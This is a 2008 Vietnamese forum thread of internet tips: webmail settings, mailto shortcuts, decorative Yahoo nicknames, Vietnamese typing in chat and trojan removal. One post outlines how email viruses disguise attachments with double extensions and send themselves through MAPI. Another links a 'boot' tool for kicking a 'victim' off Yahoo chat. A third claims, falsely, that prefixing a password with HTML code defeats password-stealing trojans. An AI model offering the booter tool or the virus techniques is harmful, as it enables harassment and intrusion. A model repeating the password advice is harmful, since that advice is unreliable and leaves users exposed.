các thủ thuật về internet nè

Go down

default các thủ thuật về internet nè

Bài gửi by hs6_online on Sat Aug 23, 2008 9:04 am

Thủ thuật với Email, Gmail !


chúng ta chắc ai cũng quen thuộc với hòm mail của mình , nhưng có ai đã biết được hết những ưu điểm của yahoo mail chưa ? mình và các bạn thử tìm hiểu nhé , đây là 10 mẹo hay nhất của yahoo mail mà mình tình cờ đọc được ở đâu đấy , mang về truyền cho các bạn cùng biết nhé
10 mẹo hay nhất về e-mail

1.Yahoo cung cấp cách thức truy nhập POP3 đến hộp thư Yahoo của bạn. Ðiều này có nghĩa là bạn có thể sử dụng các chương trình email khác (như Outlook Express, Eudora, hoặc Netscape) để nhận và gửi thư tại địa chỉ Yahoo của bạn... ruy nhập hộp thư Yahoo từ các chương trình thư khác.
Muốn cấu hình chương trình thư điện tử của bạn có thể sử dụng với Yahoo Mail, bạn thêm một account mới với các tham số được thiết lập như sau:
PRIVATEPOP3 Server: pop.mail.yahoo.com
SMTP server: smtp.mail.yahoo.com
User name: Tên truy cập hộp thư Yahoo của bạn
Password: Mật khẩu truy nhập hộp thư Yahoo của bạn
Theo cách này, bạn có thể tải các thư trong hộp thư Yahoo của bạn để đọc ngoại tuyến, giúp bạn tiết kiệm thời gian truy nhập mạng. Tuy nhiên, bạn cũng cần phải nhớ rằng, bạn phải trả một giá nho nhỏ với phương thức truy nhập POP3 của Yahoo. Trước khi sử dụng chương trình thư của bạn cho việc nhận và gửi thư ở hộp thư Yahoo, bạn cần phải đăng ký Yahoo Delivers và thỉnh thoảng phải nhận một vài quảng cáo từ các đối tác của Yahoo.

2. Bookmark hộp thư Hotmail của bạn
Nếu bạn sử dụng máy tính riêng (Không bận tâm đến vấn đề người khác có thể đọc thư của bạn cũng như sử dụng hộp thư của bạn để gửi thư tới những người khác), bạn có thể bookmark hộp thư Hotmail của bạn. Ðể làm được điều đó, hãy tạo một bookmark hoặc favourite trong trình duyệt của bạn đối với địa chỉ
Truy nhập địa chỉ với bookmark vừa tạo. Ðiền các thông tin truy cập của bạn và sau đó đánh dấu vào ô chọn Keep me signed in to this and all other Passport sites unless I sign out. Bấm Sign in để truy nhập account của bạn.
Lần sau, mửi khi bạn chọn Bookmark, bạn sẽ tới ngay hộp thư mà không cần phải điền tên và mật khẩu truy nhập của bạn. Tính năng này vẫn có hiệu lực cho đến khi bạn đăng ký huỷ (sign out) khỏi Hotmail.

3. Thêm nhanh tên người gửi thư vào sổ của chỉ của Outlook Express Nếu bạn có thói quen là thường ghi lại địa chỉ của người gửi thư vào sổ địa chỉ (Address book) của bạn ngay sau khi nhận được thư, Outtlook Express có thể giúp bạn thực hiện điều này một cách dễ dàng và nhanh chóng:
Ðể thêm người gửi thư cho bạn vào sổ địa chỉ, bạn chỉ cần di con trỏ chuột đến thư của người đó trong danh sách thư cho đến khi nó sẽ được hiện đậm lên. Chọn Tool/Add Sender to Addres Book, tên và địa chỉ (ở phần From) của người gửi thư cho bạn sẽ được chèn vào sổ địa chỉ. Cách này không bắt bạn trả lời bất cứ một thông tin nào khác. Bạn có thể vào sổ địa chỉ nếu muốn sửa hoặc thêm các thông tin khác về người gửi thư.

4. Kiểm tra các hộp thư khác bằng hộp thư Yahoo
Khi bạn đang ở đâu đó, chỉ có thể sử dụng trình duyệt mà không sử dụng được bất kỳ một chương trình thư điện tử nào, bạn có thể dùng account thư Yahoo của mình để truy nhập các account thư điện tử (POP) khác của bạn. Muốn vậy, trong Yahoo, vào mục Option và chọn Check Other (rop) Mail và đánh vào các thông tin về account thư cần kiểm tra. Ðánh tên máy chủ cùng cặp tên truy nhập/mật khẩu và chọn OK. Quay trở lại trang Check Other (POP) Mail, bấm Check Mail để nhận các thư mới từ hộp thư cần kiểm tra.

5. Kiểm tra các hộp thư khác bằng hộp thư Hotmail
Một tình huống tương tự như mục 4. Muốn sử dụng hộp thư Hotmail của bạn để nhận thư của các hộp thư khác, bạn có thể làm như sau:
Từ trang Hotmail Inbox, chọn liên kết (hyperlink) POP Mail bên thanh định hướng ở bên trái. Ðiền vào các ô POP Server Name, User Name and Password những thông tin tương ứng của hộp thư POP của bạn. Bạn cũng nên nhớ đánh dấu vào ô Leave message on POP server để về sau bạn có thể nhận lại được những thư này bằng các chương trình thư điện tử thông thường khác. Kết thúc bằng cách bấm phím OK.
Khi bạn bấm lại vào POP Mail trong trang Hotmail Inbox, Hotmail sẽ nhận về các thư trong hộp thư cần kiểm tra của bạn.

6. Chèn các ký hiệu vui (smiley) vào thư Hofmail Các ký hiệu vui như hoặc :-O chỉ đơn thuần là những ký tự hợp lại. Với Hotmail, bạn có thể chèn vào thư các ký hiệu vui đồ họa rất phong phú. Khi soạn thư, bạn nhớ đánh dấu hộp kiểm tra Rich Text Format. Ðặt con trỏ vào bất cứ chử nào bạn muốn chèn thêm ký hiệu vui và bấm vào smiley màu vàng ở thanh công cụ hử trợ soạn thảo. Chọn biểu tượng bạn muốn chèn vào thư từ danh sách. Bạn có thể xoá các ký hiệu vui đồ họa này giống như các ký tự thông thường.

7. Lưu trữ các thư riêng với Outlook Express Ðối với những thư đặc biệt quan trọng, bạn có thể lưu chúng trong folder save của Outlook Express hoặc in ra. Tuy nhiên, trong Outlook Express, còn có một cách lưu trữ thư riêng rất dễ nhưng ít người biết đến. Mở folder có thư bạn muốn lưu, chọn và kéo thư bạn muốn bằng chuột sau đó thả vào nơi bạn muốn lưu (trên đĩa mềm, đĩa cứng, đĩa CD hoặc bất kỳ thiết bị lưu trữ nào khác).
Cách này sẽ tạo ra tệp sao của thư với phần mở rộng là EML. Nếu muốn mở lại, bạn chỉ cần kích đúp chuột vào tệp này. Bạn cũng có thể import thư đã lưu vào Outtlook Express bằng cách kéo và thả vào một fofder trong Outlook Express.

8. Tìm thư trong Yahoo
Nhiều khi, bạn chỉ nhớ một số từ trong một bức thư nào đó nhưng không biết chính xác ở thư nào. May thay, Yahoo có một công cụ tìm kiếm tuyệt vời giúp bạn tìm lại những thư bạn cần.
Bấm vào liên kết Search bên trái trang Yahoo Mail sẽ đưa bạn đến trang tìm kiếm. Bạn có thể tìm kiếm theo nhiều tiêu thức và phạm vi khác nhau (theo tiêu đề thư, nội dung thư, ngày tháng, theo folder). Thay vì phải lần giở từng thư một, bạn hãy thử tính năng này của Yahoo Mail để tìm kiếm thư được nhanh hơn.

9. Truy nhập trang trợ giúp của Hofmail mà không cần thay đổi kích thước cửa sổ Hotmail có một site trợ giúp người dùng với rất nhiều thông tin bổ ích. Nhưng điều phiền toái là mửi khi bạn chọn mục Help từ Hotmail, các nội dung trợ giúp sẽ được hiển thị dưới chế độ toàn màn hình. Hơn nữa, sau khi đóng cửa sổ trợ giúp, màn hình Hotmail cũng bị thay đổi kích thước không giống bình thường.
Ðể tránh phiền toái này, mửi khi bạn muốn truy nhập trang trợ giúp rất đáng giá của Hotmail, hãy theo liên kết sau:

" target=_blankhttp://help.ms...............&sp=1


Bạn có bao giờ bị ăn Bommail hi` rất khó chịu có phải không , một lúc nhận được 5000 - 7000 lá email thì đó quả thật là một điều khủng khiếp , mà bạn vẫn cứ xoá 25 bức một lần thì không biết đến bao giờ mới có thể hoàn thiện được . Nay mình xin đưa ra một cách bạn có thể del đi 200 bức thư một lúc như thế sẽ nhanh hơn nhiều và cũng thuận tiện hơn . Đầu tiên bạn vào Mail yahoo => my options = > General PreferencesTại dòng Messages Perpage bạn chon 200 rồi ấn save là được thế là bạn có thể xoá đi 200 bức Mail trong một lần rồi đó. Chúc các bạn thành công
Trong bài này tôi xin trình bày một vài mẹo nhỏ có ích đối với hầu hết các chương trình gửi/nhận thư điện tử như Eudora, Microsoft Outlook 97, 98 hay Express. ở các chương trình này địa chỉ người nhận chính là các địa chỉ thư điện tử: ví dụ thds@vnn.vn... hay là bất cứ một tên hợp lệ theo chuẩn của Microsoft Exchange.

Muốn tạo một bức thông điệp mới mà không cần khởi động chương trình gửi/nhận thư, bạn hãy mở hộp Run ( - R) rồi gõ mail to: địa_chỉ_người_nhận, và cuối cùng gõ phím Enter. Điều này sẽ mở màn hình soạn thảo một bức thư mới với địa chỉ người nhận đã được điền sẵn theo thông tin bạn gõ vào, đồng thời con trỏ nhấp nháy ngay tại trường Subject sẵn sàng chờ bạn.

Nếu bạn muốn gửi thư cho rất nhiều người cùng một lúc, bạn hãy gõ lần lượt các địa chỉ này cách nhau bằng một dấu chấm phẩy,

Ví dụ:

thds@vnn.vn;hoi_dap_tin_hoc@fpt.vn...

Nếu bạn muốn điền ngay thông tin trong trường Subject bạn hãy gõ vào như sau:

"mailto:thds@vnn.vn?subject=Hỏi đáp tin học"

Chú ý bạn hãy gõ cả dấu "?" đặc biệt khi dòng Subject có chứa ký tự trắng.

Nếu bạn muốn gửi đồng thời cho một ai khác (cc - carbon copy) bạn hãy gõ:

"mailto:thds@vnn.vn?subject=Hỏi đáp tin học?cc=hoi_dap@vnn.vn"

Không chỉ có như vậy, bạn có thể gõ cả thông điệp vào trong dòng lệnh gửi thư của bạn. Ví dụ:

"mailto:thds@vnn.vn?body=Gửi nhận thư tự động như thế nào? Xin tạp chí vui lòng giải đáp"

Cuối cùng tất cả những kỹ thuật trên đều có thể được thực hiện dưới dạng dòng lệnh và tạo biểu tượng tắt. Bấm phím phải chuột lên desktop của bạn và chọn New/Shortcut. Trong hộp thoại bạn hãy gõ bất cứ dạng lệnh nào muốn nêu trên (chú ý sử dụng các dấu hỏi khi cần thiết) và bấm Finish. Vậy khi nào bạn cần sử dụng những biểu tượng tắt này. Ví dụ khi bạn cần gửi một báo cáo cho "sếp" của mình hay các đồng nghiệp chẳng hạn. Bạn thấy đó, công việc gửi thư có thể được hoàn tất bằng một thao tác nháy chuột đơn giản phải không nào?
avatar
hs6_online
Siêu Nhân Đại Học
Siêu Nhân Đại Học

Nữ
Tổng số bài gửi : 372
Age : 28
+ Nơi ở : ?????
+ Sở thích : đi du lịch,ngồi net xuyên đêm
+ Tính tình : vui vẻ,dể gần
+ Tên thật .... : đừng bận tâm về chuyện này
+ Ước mơ của tớ là .... : lên sao hoả,đi xuyen việt
+ Câu nói ưa thích của tớ .... : ko có gì là ko thể trừ khi chúng ta ko thể
Registration date : 16/08/2008

Xem lý lịch thành viên

Về Đầu Trang Go down

default Re: các thủ thuật về internet nè

Bài gửi by hs6_online on Sat Aug 23, 2008 9:06 am

Liên Kết 2 Hòm Thư Yahoo Với Nhau


Đầu tiện bạn phải vào hòm thư Yahoo .sau đó chọn Mail Options như hình sau và nó sẽ xuất hiện 1 giao diện mới .


Bước tiếp theo Bạn chọn Genneral Preferences. Sau đó tai chỗ Reply to bạn điền địa chỉ hòm thư yahoo muốn liên kết vào .Sau này bất kì lá thư nào tự hộp thư này nhận được thì sẽ có 1 lá được gởi tới hòm thư mà bạn liên kết !

Bạn không chỉ thực hiện liên kết giữa 2 hòm thư yahoo mà có thể giữa yahoo và bất kì hòm thư khác !
Chúc bạn thành công !


Cách thức gắn virus vào mail

gắn virus vào phần nội dung mail
vì các đoạn Script có khả năng hoạt động nếu như một máy dùng trình duyêt IE cho phép chạy ActiveX vì vậy virus cũng có thể lây theo đường này gắn virus vào file gắn kèm ( Attach files)
Virus xây dựng các file dính kèm bằng những thủ thuật sau :
để tránh bị lộ diện virus tạo file bằng 2 phần đuôi
ví dụ aaaa.doc.exe
chính vì vậy mà virus tạo ra file này như thế nào :
tìm trong thư mục my documents và lấy tên của các file tìm thấy
ví dụ : bbbb.doc nó sẽ lưu tên này vào phần dữ liệu , nếu như khi cần gởi thì nó sẽ tạo ra file bbbb.doc.exe để dính kèm vào thư , sau đó tiến hành việc mã hóa theo chuẩn MINE hay Base64 các đoạn mã này do virus tự làm
Gởi mail
Để gởi mail virus có thể tự xây dựng cho mình một cơ cấu SMTP riêng hoặc dựa trên các hàm MAPI trong thu viện MAP32DLL , như MAPILogon, MAPISendMail, MAPISendDocument
VII)Kỹ thuật phá hoại :
1) Các virus ngoải những cách phá hoại thông thường còn có khả năng gây ra tấn công theo kiểu ngăn chặn dịch vụ DOS , ví dụ chúng cho một server nào đó mở một port và điều khiển các máy bị nhiễm truy cập vào server này làm cho số nối kết đến máy chủ vượt quá cho phép
2) Mở một port cho phép truy cập vào máy bị nhiễm
3) Có khả năng cho phép điều khiển từ xa
4) Có thể tấn công máy in vì tưởng rằng máy in cũng là một máy tính nào đó
VIII ) Những khả năng nào khiến cho bạn bị nhiễm Virus hoặc Trojan
A) Do chính bạn
1) Khi bạn truy cập vào một số trang web mà các trang này bị nhiễm virus hoặc Tojan rồi
2) Download những file đã bị nhiễm
3) Nhận mail đã bị nhiễm
4) Nhận một số file từ một người đang chat với bạn
5) Mua disk CD ở ngoài đã bị nhiễm
6) Bạn cho Phép một người khác đem file bị nhiễm vào máy mình
7) Do một số chương trình bạn đang dùng đã được chính hãng gài vào
Do Người khác cố ý
1) Do máy bạn đã được hacker viếng thăm
2) Do người yêu bạn gài vào theo dõi bạn mà bạn không biết
3) Do người bạn thân của bạn
4) Do người bán máy cho bạn gài vào
5 )Do những hãng sản xuất phần cứng gài vào trong các driver
6) Do hãng sản xuất ra phần mền
7) Do hãng sản xuất HĐH
Do KTV bạn mời đến sữa máy cho bạn gài vào
Bạn sẽ không bao giờ có thể thoát được nếu như có một đối tượng nào đó cố ý gài vài
IX) Cách Thức Remove Trojan
Dựa vào đặc điểm của Trojan ta có cách remove nó như sau :
Vì trojan hoạt động cần phải được kích hoạt nên ta tìm cách không cho nó kích hoạt , vỉ vậy muốn diệt được trojan cần phải kiểm tra tất cả những vị trí sau :
Trong các Autostart Folder :
ví dụ file khởi động của trojan là trojan.exe thì
C:\Windows\Start Menu\Programs\startup\trojan.exe
+ Trong file C:\windows\Win.ini tại dòng lệnh
load=Trojan.exe
hoặc run=Trojan.exe
+ Trong file c:\windows\system.ini sau dòng lệnh shell
Shell=Explorer.exe trojan.exe
Trojan sẽ tự động chạy khi file Explorer.exe chạy
+ Trong Autoexec.bat
c:\....\Trojan.exe
+ Explorer Startup
c:\explorer.exe,c:\...\trojan.exe
+ Tạo một khóa trong Registry :
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run]
"trojan"="c:\...\Trojan.exe"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunOnce]
"trojan"="c:\...\Trojan.exe"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServices]
"trojan"="c:\...\Trojan.exe"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServicesOnce]
"trojan"="c:\...\Trojan.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run]
"trojan"="c:\...\Trojan.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\RunOnce]
"trojan"="c:\...\Trojan.exe"
- Trong Registry Shell Open với key là "%1 %*"
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\ open\command]
trojan.exe "%1 %*"
del tất cả các dòng lệnh có file mà trojan boot ở đây ví dụ là file trojan.exe
- Trong 1 số ứng dụng mà cho phép một số chương trình co the chay :
ví dụ ICQ
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\App s\]
- Trong ActiveX
[HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\KeyName]
StubPath=C:\...\Trojan.exe
nếu như nó lây nhiễm qua một mIRC thì vào cửa sổ của nó
1.đánh /unload -rs script.ini
sẽ nhìn thấy : *** Unloaded script.ini
2. đánh command.com /c attrib.exe -s -r script.ini
3.đánh /write -c script.ini
4.đánh /remove script.ini
sẽ nhìn thấy : *** Removed 'c:\mirc\script.ini'.
5.đánh //say $exists(script.ini)
nếu $false lặp lại bước 2 đến bước 4
6.đánh /sreq ask
7.đánh /creq ask
8.đábg /dccserver off
9. Thay đổi tất cả các pass của bạn
avatar
hs6_online
Siêu Nhân Đại Học
Siêu Nhân Đại Học

Nữ
Tổng số bài gửi : 372
Age : 28
+ Nơi ở : ?????
+ Sở thích : đi du lịch,ngồi net xuyên đêm
+ Tính tình : vui vẻ,dể gần
+ Tên thật .... : đừng bận tâm về chuyện này
+ Ước mơ của tớ là .... : lên sao hoả,đi xuyen việt
+ Câu nói ưa thích của tớ .... : ko có gì là ko thể trừ khi chúng ta ko thể
Registration date : 16/08/2008

Xem lý lịch thành viên

Về Đầu Trang Go down

default Re: các thủ thuật về internet nè

Bài gửi by hs6_online on Sat Aug 23, 2008 9:09 am

boot mới nè kick out nhanh chóng, có cả bản hướng dẫn cụ thể rùi nè..

trước hết nói về cái v11 là loại boot dung để kick vctim out khỏi mạng
để sử dụng được trước hết bạn cần có 1 nick yahô tốt nhát là nên lập 1 cái riêng chỉ dùng để bôt kick mà thui ok
bây giờ bạn down nó về

----> http://neo2remember.com/bootnew/LoveToBootV12.zip <-------

down xong rui giai ne'n
no' se~ co giao dien nhu sau
http://upload.tuoitrehalong.com/store/wwwwwwwwwwwww.JPG

chúc bà con thực hành thành công
avatar
hs6_online
Siêu Nhân Đại Học
Siêu Nhân Đại Học

Nữ
Tổng số bài gửi : 372
Age : 28
+ Nơi ở : ?????
+ Sở thích : đi du lịch,ngồi net xuyên đêm
+ Tính tình : vui vẻ,dể gần
+ Tên thật .... : đừng bận tâm về chuyện này
+ Ước mơ của tớ là .... : lên sao hoả,đi xuyen việt
+ Câu nói ưa thích của tớ .... : ko có gì là ko thể trừ khi chúng ta ko thể
Registration date : 16/08/2008

Xem lý lịch thành viên

Về Đầu Trang Go down

default Re: các thủ thuật về internet nè

Bài gửi by hs6_online on Sat Aug 23, 2008 9:10 am

Các vấn đề + thủ thuật về Y!M......

Từ ngày 15/6/2005 Yahoo! đã chính thức cung cấp giao diện tiếng Việt cho Yahoo! Mail tại địa chỉ : http://login.yahoo.com/config/login?.intl=vn
Bạn cũng có thể truy cập trang http://www.mail.yahoo.com, sau đó nhấn vào liên kết viêtnam o cuối trang.
Nếu bạn kiểm thư bằng trang http://www.mail.yahoo.com.vn thì bên trong toàn tiếng Việt.
Nếu bạn dùng địa chỉ mail.yahoo.com (http://www.mail.yahoo.com) ( hay yahoo.co (http://www.yahoo.co) , yahoo.co.uk (http://www.yahoo.co.uk),...) thì giao diện cũng chỉ toàn tiếng Anh. Để chuyển sang tiếng Việt các bạn làm theo các bước sau :
1. Đăng nhập hộp thư
2.Nhấn vào My Account Info ( Gần dòng chử Logout)
3.Nhập lại mật khẩu hộp thư của bạn để sửa đổi thông tin
4.Nhấn nút Edit trong phần Members Information. Bấm tiếp vào Preferred Content, nhấn Yahoo! US ( co thể là tên khác). Trang danh muc ngôn ngữ hiện ra, bạn chọn VietNam, nhấn Finish -> "Tôi Chấp nhận". Vậy là xong.


Đối với mấy pác đi chat ở dịch vụ thì nguy cơ bị mất pass là rất cao( do chủ tiệm cài trojan để lấy pass của khách, mấy thằng chơi trước nó cài lại,...).
Tui xin hướng dẩn pà kon một cách đơn giản nhưng rất hữu hiệu để chống mât pass.
Pà kon cứ việc thêm một đoạn code html vào trước password cua mình là đảm bảo không bị mất pass nửa.
VD : pass của tui như .iloveyou, nếu máy có cài trojan ( ở đây tui nói là PS magic - vì nó phổ biến nhất) thì nó sẽ gửi về cho chủ nó như sau : .iloveyou
khà khà, vậy là nó đã lấy sai pass của pà kon rồi, pà kon cứ yên tâm chát ha.
Chúc pà kon có những giây phút thư giãn thoải mái nha.Khi các bạn chát đôi khi các bạn gặp 1 số nick đặc biêt như !!!-@nh yeu em -!!! , thỉnh thoảng các bạn còn gặp những nick đặc biệt hơn nữa Vd: ®(¯`v´¯)«girlr»(¯`v´¯)..Các bạn đọc bài sau đây sẽ hiểu và biết cách làm nick phủ bằng font china :oops:

Trước tiên các bạn vào mail.yahoo.com hoặc mail.yahoo.co.uk để đăng nhập (login) hay vào yahoo mesenger rui chọn acc infomation

Sau khi đăng nhập dưới ID (nick) của bạn sẽ thấy chữ My Account bên cạnh Sign out , nhấn vào đó.

Tiếp đến, một bảng hiện ra yêu cầu bạn nhập password để vào Account Information, nhập password và vào thoại (ấn Continue)

Bạn chú ý đến cái dòng chữ to nền vàng Member Information và nhìn vào bên trái có chữ Edit, ấn vào đó

Một trang mới hiện ra , kéo xuống cuối trang, chú ý dòng General Preferences. Ở mục Language & Content có 1 đoạn chữ màu xanh có gạch chân (thường là English- United States) ấn vào đó. Lúc đó, màn hình sẽ hiện ra một trang mới, nhìn thấy New setting, chọn Chinese- China (Mainland) rồi nhấn vào Finished, OK

Sau đó, 1 chuỗi ký tự vô cùng lạ xuất hiện, bạn đừng quan tâm, kéo xuống cuối trang . Sẽ thấy 2 ô với 2 lựa chọn , ấn vào cái ô bên trái để tiếp tục (nó có dạng ÎO½OÊÜ)

Trang acc information lại xuất hiện, bạn nhìn sang phải dưới cái ID của bạn (uname24) và các nick ảo sẽ là 1 cái chữ màu xanh có gạch dưới (¼/´´½¨¸öÈ˵µ°)¸, ấn vào đó (nó là cái Edit/Create profile )

Hiện ra một trang web với ID thật và các nick ảo của bạn, Chọn nick mà bạn muốn làm, chọn ký tự đặc biệt rồi ấn vào ô có hình tương tự [±à¼]

Một trang mới xuất hiện, ấn vào cái chữ màu xanh gạch dưới tương tự ±à¼¸öÈ˵µ° (ở ngay trên đầu và ở giữa đó )

Một trang mới lại xuất hiện , ở cái ô thứ 2 có dạng ÄØ³Æ (hoặc được ghi là Nick name ở một số máy) đánh vào đó những gì mà bạn muốn ( bảng ký tự đặc biệt tôi sẽ cho ở dưới ) Sau đó kiểm tra ấn vào cái ô tương tư như ³ÉԱĿ¼ ở cuối trang .

Bây giờ cái nick của bạn đã làm xong .

Công việc của bạn là vào lại Account information và chuyển từ tiếng china mainland thành tiếng Anh ( làm như phần đầu hướng dẫn). Cái member information chuyển thành Óû§ÐÅÏ¢ cái Language& content chuyển thành ÓïÑÔ¼°ÄÚÈÝ£º , Bấm vào cái link đó và chọn dòng English United states sau đó ấn vào cái ô có dạng Íê³É (ở bên trái) . Rồi, tiếng Anh lại xuất hiện bạn làm tiếp nha.

Sau đây là bảng kí tự đặc biệt (symbols) ( khỏang 90% symbols ròai)

a ð å Å Â ª Ä Á À ã Ã A b ß (3 B c Ç ç © ¢ C d ð Ð D e ë é ê è í € £ Ë É Ê È E f ƒ F g G h µ H i | | ï í î ì ¡ ¦ Ï Í Î Ì I j ¿ J k |{ |< K l £ ¿ L m (v) M n ñ Ñ N o ø Ø º ° ¤ Õ () O p þ Þ P ¯`•.¸

q Q are ® are s § $ S t ~|~ ¯|¯ T u ü ú û ù µ |_| Ü Ú Û Ù you v V w W x × X y ÿ ¥ Y z Z æ Æ Œ ® © ™ ¿ ? ½ ¼ ¾ ¨ ¯ • « » ¹ ² ³ ‡ † þ Þ ¤ § ± ÷ ¦

Để làm được nick đặc biệt mỗi khi cần bạn chỉ cần Copy từng kí tự vào cái ô nick name( như tôi đã hướng dẫn ở trên )( paste vào)

Cách nhanh để vào account Information là http://edit.yahoo.com/config/eval_profile

Cách nhanh để vào Edit profile là http://edit.profiles.yahoo.com/config/edit_identity
đây là các kí tụ phủ nick bằng font china đầy đủ
æ Æ Œ ® © ™ ¿ ? ½ ¼ ¾
¬ ¨ ¯ · « » ¹ ² ³ ‡ †
þ Þ ¤ § ± ÷ ¦

(¯`·._.·[ (your nickname here) ]·._.·´¯)
¨°o.O (your nickname here) O.o°
×÷·.·´¯`·)» (your nickname here) «(·´¯`·.·÷×
· ··^v´¯`×) (your nickname here) (×´¯`v^·· ·
,.-~*'¨¯¨'*·~-.¸-(_ (your nickname here) _)-,.-~*'¨¯¨'*·~-.¸
- - --^[ (your nickname here) ]^-- - -
•·.·´¯`·.·• (your nickname here) •·.·´¯`·.·•
`·.¸¸.·´´¯`··._.· (your nickname here) `·.¸¸.·´´¯`··._.·
(¯`·._) (your nickname here) (¯`·._)
¯¨'*·~-.¸¸,.-~*' (your nickname here) ¯¨'*·~-.¸¸,.-~*'
Oº°‘¨ (your nickname here) ¨‘°ºO
׺°”˜`”°º× (your nickname here) ׺°”˜`”°º×
.·´¯`·-> (your nickname here) <-·´¯`·.
<º))))><.·´¯`·. (your fishname here) ¸.·´¯`·.¸><((((º>
- -¤--^] (your nickname here) [^--¤- -
~²ºº²~ (your nickname here) ~²ºº³~
._|.<(+_+)>.|_. (your nickname here) ._|.<(+_+)>.|_.
..|..<(+_ (your nickname here) _+>..|..
-·=»‡«=·- (your nickname here) -·=»‡«=·-
•°o.O (your nickname here) O.o°•
––––•(-• (your nickname here) •-)•––––
(¯`•¸·´¯) (your nickname here) (¯`·¸•´¯)
··¤(`×[¤ (your nickname here) ¤]×´)¤··
—(•·÷[ (your nickname here) ]÷·•)—
·ï¡÷¡ï· (your nickname here) ·ï¡÷¡ï·
·!¦[· (your nickname here) ·]¦!·
°º¤ø,¸¸,ø¤º°`°º¤ø,¸ (your nickname here) °º¤ø,¸¸,ø¤º°`°º¤ø,¸
»-(¯`v´¯)-» (your nickname here) »-(¯`v´¯)-»
°l||l° (your nickname here) °l||l°
•°¤*(¯`°(F)( (your nickname here) )(F)°´¯)*¤°•
—¤÷(`[¤* (your nickname here) *¤]´)÷¤—
¸.´)(`·[ (your nickname here) ]·´)(` .¸
·÷±‡± (your nickname here) ±‡±÷
+*¨^¨*+ (your nickname here) +*¨^¨*+
Chuc' mo+i. nguo+`i co' 1 cai' nic' dep. nhe'
avatar
hs6_online
Siêu Nhân Đại Học
Siêu Nhân Đại Học

Nữ
Tổng số bài gửi : 372
Age : 28
+ Nơi ở : ?????
+ Sở thích : đi du lịch,ngồi net xuyên đêm
+ Tính tình : vui vẻ,dể gần
+ Tên thật .... : đừng bận tâm về chuyện này
+ Ước mơ của tớ là .... : lên sao hoả,đi xuyen việt
+ Câu nói ưa thích của tớ .... : ko có gì là ko thể trừ khi chúng ta ko thể
Registration date : 16/08/2008

Xem lý lịch thành viên

Về Đầu Trang Go down

default Re: các thủ thuật về internet nè

Bài gửi by hs6_online on Sat Aug 23, 2008 9:11 am

chát có dấu


Thật là bực mình khi mà bạn chat của chúng ta cứ hiểu lầm điều ta muốn nói.
Vấn đề chat bằng tiếng Việt trong Yahoo tuy đã cũ, nhưng hiện vẫn còn rất nhiều bạn thắc mắc. Vậy nay tôi post bài này để giải đáp cho những người chưa biết (ai biết rồi ngồi yên nhá )
Bạn chỉ có thể chat bằng tiếng Việt có dấu nếu như máy tính của bạn cài Yahoo Messenger 6 trở lên, với máy tính chạy Win2000 hoặc WinXP.
Ở đây tôi sẽ nói trường hợp máy cài WinXP, còn Win2000 thì tương tự thế thôi. Đầu tiên phải cài bộ font unicode hỗ trợ tiếng Việt sắn có trong đĩa cài WinXP bằng cách vào ****trol Panel", chọn mục "Regional and Language Options". Sau đó chọn Tab "Languages". Trong Tab này đánh dấu vào mục "Install files for complex script and right-to-left languages(including Thai)". Nhét đĩa cài WinXP vào ổ, nhấn Apply. Windows sẽ tự động cài các font Unicode cần thiết giúp hiển thị tiếng Việt.
Sau khi cài xong font chữ việt unicode như trên, bạn tải Unikey 3.62 (tôi đính kèm ở bài này) về. Giải nén nó ra rồi chạy file Uk362Setup.exe để cài đặt. Sau khi cài xong, bạn mở bảng điều khiển unikey, chọn bảng mã là Vietnamese Locale CP 1258.
Okie, bạn đã có thể chat bằng tiếng Việt có dấu trong Y!M.

Hiện nay đã có Yahoo Messenger 7.0, phiên bản này hỗ trợ hoàn toàn Unicode. Vậy nên, nếu bạn dùng Y!M 7.0 thì chỉ việc cài Vietkey, hay Unikey, hay bất kỳ bộ gõ nào hỗ trợ gõ Unicode là có thể gõ được tiếng Việt có dấu trong Y!M.

P/S:
- Nếu bạn chat ở dịch vụ thì tốt nhất là download bản Y!M7.0 về rồi cài cái unikey này vào, thế là xong.
- Để kiểm tra máy mình đã cài bộ font unicode hỗ trợ tiếng Việt trong WinXP, bạn hãy vào ****trol Panel", chọn mục "Regional and Language Options". Sau đó chọn Tab "Languages". Trong Tab này, nếu bạn thấy mục "Install files for complex script and right-to-left languages(including Thai)" đã đuược đánh dấu thì có nghĩa là máy đã cài, còn nếu chưa thì bảo chủ quán vác đĩa WinXP ra rồi cài như hướng dẫn bên trên.
nhấp vào (http://www.unikey.org/bdownload.php)
avatar
hs6_online
Siêu Nhân Đại Học
Siêu Nhân Đại Học

Nữ
Tổng số bài gửi : 372
Age : 28
+ Nơi ở : ?????
+ Sở thích : đi du lịch,ngồi net xuyên đêm
+ Tính tình : vui vẻ,dể gần
+ Tên thật .... : đừng bận tâm về chuyện này
+ Ước mơ của tớ là .... : lên sao hoả,đi xuyen việt
+ Câu nói ưa thích của tớ .... : ko có gì là ko thể trừ khi chúng ta ko thể
Registration date : 16/08/2008

Xem lý lịch thành viên

Về Đầu Trang Go down

default Re: các thủ thuật về internet nè

Bài gửi by hs6_online on Sat Aug 23, 2008 9:12 am

Cách phát hiện nick thật nick ảo


Các bạn thân mến hôm nay mình sẽ giúp các bạn xác đinh Nick thật hay Nick ảo của bạn chat ở Yahoo nha .

Đầu tiên các bạn Click chuột Phải vào NickName bạn muốn kiểm tra . Sau đó các bạn chọn mục "View Profiles "

Sau khi chọn thì bảng Profile của nick đó sẽ hiện lên : ( Tôi ví dụ Profile của 1 bạn có Nickname là : hello )

Các bạn chú ý những phần sau :

Profile Stats
Last Updated: 07/28/2003

My Email
Private

On Yahoo!
Add to friend list
· Messenger

--------------------------------------------------------------------------------

Basics
Yahoo! ID: huyenthuong_203
Real Name:
Location:
Age:
Marital Status:
Gender: No Answer
Occupation:Send me a message


Links Create your own home page at GeoCities!
· Home Page: No home page specified
· Cool Link: No cool link specified

